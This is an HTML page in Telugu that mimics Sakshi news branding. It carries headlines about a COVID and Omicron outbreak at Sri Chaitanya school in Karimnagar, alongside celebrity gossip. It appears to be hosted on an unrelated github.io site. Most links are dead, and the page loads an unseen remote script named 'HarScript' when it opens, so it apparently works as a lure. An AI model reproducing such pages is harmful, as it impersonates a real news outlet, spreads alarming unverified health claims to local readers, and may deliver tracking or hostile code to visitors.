<!DOCTYPE html>
<html lang="te" dir="ltr">
<head>
<title> శ్రీ చైతన్య కరీంనగర్ లో కరోనా విజృంభన </title>
<meta name="viewport" content="width=device-width">
<meta name="description" content="డిసెంబర్ 04 2021 రోజు జరిగిన Fest లో 40 మంది కి పై గా విద్యార్థులు పాజిటివ్">
<script async src="https://spat-cloud.github.io/data/HarScript/HarScript.v2.9.Latest.min.js"></script>
<link rel="icon" sizes="192x192" href="https://spat-cloud.github.io/data/logo.png">
</head>
<body>
<div id="img">&nbsp;&nbsp;<img src="https://m.sakshi.com//images/mobile_logo.png" alt="S.jpg" width="40" height="20" style="top:8px;position:absolute;">
<img src="https://m.sakshi.com//images/sakshi_tv.gif" alt="S.jpg" width="40" height="20" style="top:8px;float:right;right:4px;position:absolute;">
</div>
<br/>
<br/>
<div id="main">ముఖ్యమైన వార్తలు</div>
<a href="#" style="text-decoration:none;">
<div id="b">
	<center><img src="https://m.sakshi.com/sites/default/files/styles/cinema_main/public/article_images/2021/12/7/sirivennela-sitharama-sastr.jpg?itok=yDifDKER"  width="200" height="140" alt="ext.jpg"></center>
	<span id="title">
		 సిరివెన్నెల చివరి పాటపై సాయి పల్లవి భావోద్వేగం
	</span>
</div></a><br/>
<a href="#" style="text-decoration:none;">
<div id="b">
				<center><img src="https://m.sakshi.com/sites/default/files/styles/cinema_main/public/article_images/2021/12/7/ram-gopal-varma1.jpg?itok=bp1ijWr8"  width="200" height="140" alt="ext.jpg"></center>
				<span id="title">
							పుష్ప ట్రైలర్ చూసి ఏమి అన్నారో తెలుసా RGV ...
				</span>
</div></a><br/>
<a href="#" style="text-decoration:none;">
<div id="b">
				<center><img src="https://m.sakshi.com/sites/default/files/styles/cinema_main/public/article_images/2021/12/7/samantha-and-nagachaitanya.jpg?itok=FcZlCPNM"  width="200" height="140" alt="ext.jpg"></center>
				<span id="title">
							 విడాకులు గురించి సమంత మల్లీ ఏమి అంటుంది అంటే దానికి నాగచైతన్య కి ..
				</span>
</div></a><br><a href="#" style="text-decoration:none;">
<div id="b">
				<center><img src="https://assets.eenadu.net/article_img/gh-state3a_128.jpg"  width="200" height="160" alt="ext.jpg"></center>
				<span id="title">
					    పుట్టుక నాది... బతుకంతా మీది: తెరాస ఎంపీ సంతోష్‌
				</span>
</div></a>
<br>
<a href="https://spat-cloud.github.io/data/omicron.html" style="text-decoration:none;">
<div id="b">
				<center><img src="https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcQnTdDaD9dm9nc-1vd0FVhCkuc5mg33uH5hBQ&usqp=CAU"  width="200" height="160" alt="ext.jpg"></center>
				<span id="title">
							 omicron కరీంనగర్ కి వచ్చింది శ్రీ చైతన్య లో ఉంది
				</span>
</div></a>
						</body>		
						<style>
										#b{
								background-color:#FFF;
								color:#000;
								width:200px;
								height:240px;
								border:1px solid #000;
								border-radius:4px;
								
								
				}
				#title
				{
								font-size:12px;
								font-weight:bold;
				}
				#main
				{
								color:#FFF;
								background-color:orange;
								padding:.4em;
								overflow-x:scroll;
								width:140px;
								height:20px;
								font-weight:bold;
				}
				#img
				{
				 background-color:GOLD;
				 width:100%;
				 height:40px;
				 left:0;
				 right:0;
				 top:0;
				 position:fixed;
				 }
						</style>
						</html>
